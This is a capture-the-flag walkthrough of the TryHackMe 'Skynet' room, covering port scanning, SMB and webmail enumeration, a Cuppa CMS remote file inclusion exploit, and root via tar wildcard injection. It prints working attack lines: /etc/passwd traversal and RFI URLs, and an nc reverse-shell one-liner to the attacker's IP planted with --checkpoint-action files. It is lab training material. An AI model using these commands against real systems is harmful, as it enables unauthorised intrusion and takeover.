Skynet
About The Room
A vulnerable Terminator themed Linux machine.
- Url: https://tryhackme.com/room/skynet
- Creator: tryhackme
- Difficulty: low
Reconnaissance
RustScan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
rustscan 10.10.206.100 -- -A -sC -sV 1 ⨯
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/cyph3r/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.206.100:22
Open 10.10.206.100:80
Open 10.10.206.100:110
Open 10.10.206.100:139
Open 10.10.206.100:143
Open 10.10.206.100:445
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -sC -sV -vvv -p 22,80,110,139,143,445 10.10.206.100
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 13:06 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Initiating Ping Scan at 13:06
Scanning 10.10.206.100 [2 ports]
Completed Ping Scan at 13:06, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:06
Completed Parallel DNS resolution of 1 host. at 13:06, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:06
Scanning 10.10.206.100 [6 ports]
Discovered open port 22/tcp on 10.10.206.100
Discovered open port 110/tcp on 10.10.206.100
Discovered open port 445/tcp on 10.10.206.100
Discovered open port 139/tcp on 10.10.206.100
Discovered open port 80/tcp on 10.10.206.100
Discovered open port 143/tcp on 10.10.206.100
Completed Connect Scan at 13:06, 0.15s elapsed (6 total ports)
Initiating Service scan at 13:06
Scanning 6 services on 10.10.206.100
Completed Service scan at 13:06, 11.46s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.206.100.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 5.21s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 2.16s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Nmap scan report for 10.10.206.100
Host is up, received syn-ack (0.15s latency).
Scanned at 2020-11-18 13:06:28 EST for 20s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
| 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 syn-ack Dovecot pop3d
|_pop3-capabilities: TOP SASL CAPA AUTH-RESP-CODE PIPELINING UIDL RESP-CODES
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 have IDLE Pre-login more SASL-IR OK ENABLE listed LITERAL+ post-login capabilities LOGIN-REFERRALS IMAP4rev1 ID
445/tcp open netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
| nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SKYNET<00> Flags: <unique><active>
| SKYNET<03> Flags: <unique><active>
| SKYNET<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 23468/tcp): CLEAN (Couldn't connect)
| Check 2 (port 47431/tcp): CLEAN (Couldn't connect)
| Check 3 (port 52570/udp): CLEAN (Failed to receive data)
| Check 4 (port 65173/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2020-11-18T12:06:41-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-18T18:06:41
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.38 seconds
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.206.100/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.206.100/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2020/11/18 13:13:34 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://10.10.206.100/admin/]
/css (Status: 301) [Size: 312] [--> http://10.10.206.100/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.206.100/js/]
/config (Status: 301) [Size: 315] [--> http://10.10.206.100/config/]
/ai (Status: 301) [Size: 311] [--> http://10.10.206.100/ai/]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.206.100/squirrelmail/]
Progress: 38177 / 220561 (17.31%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/18 13:24:34 Finished
===============================================================
smbclient
1
2
3
4
5
6
7
8
9
smbclient -L //10.10.206.100///
Enter WORKGROUP\cyph3r's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
smbclient //10.10.206.100/anonymous
Enter WORKGROUP\cyph3r's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 18 00:41:20 2019
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
books D 0 Wed Sep 18 00:40:06 2019
9204224 blocks of size 1024. 5370652 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Wed Sep 18 00:41:20 2019
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5369932 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \logs\> exit
1
2
3
cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
HTTP
http://10.10.206.100/squirrelmail/
Burp
What could be the passwords? this file looks like set of possible passwords!
1
2
3
4
5
6
head log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
Bingo! http://10.10.206.100/squirrelmail/src/webmail.php 
Let’s see what’s in his mail!
1
2
3
4
5
6
7
8
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 9:10 pm
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
We have smb password!
1
2
3
4
5
6
7
8
9
10
11
12
13
From: serenakogan@skynet
Date: Tue, September 17, 2019 2:16 am
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
balls have zero to me to me to me to me to me to me to me to me to
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
From: serenakogan@skynet
Date: Tue, September 17, 2019 2:13 am
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
smbclient
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smbclient //10.10.206.100/milesdyson -U milesdyson 1 ⨯
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5369820 blocks available
smb: \> ls
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \notes\>
1
2
3
4
cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.206.100/45kra24zxs28v3yd/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.206.100/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2020/11/18 14:54:45 Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 339] [--> http://10.10.206.100/45kra24zxs28v3yd/administrator/]
Cuppa CMS
searchsploit
1
2
3
4
5
6
searchsploit cuppa cms
------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gaining Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
Local/Remote File Inclusion
http://10.10.206.100/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd 
http://10.10.93.187/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.82.80/rshell.php
Privilege escalation
crontab
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@skynet:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@skynet:/home$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home$ vim /home/milesdyson/backups/backup.sh
From tryhackme blog
This gets a shell, navigates to the /var/www/html directory and create a backup of everything in the directory.
Well, believe it or not, this creates a vulnerability as we can use it to execute code. HelpNetSecurity best explains how this vulnerability works, but in essence, tar has wildcards and we can use checkpoint actions to execute commands.
1
2
3
4
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.9.82.80 1235 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
User flag
1
2
3
root@skynet:/home/milesdyson# cat user.txt
cat user.txt
7cexxxxxxxxxxxxxxxxxxxx807
Root flag
1
2
3
root@skynet:~# cat root.txt
cat root.txt
3f03xxxxxxxxxxxxxxxxxxa949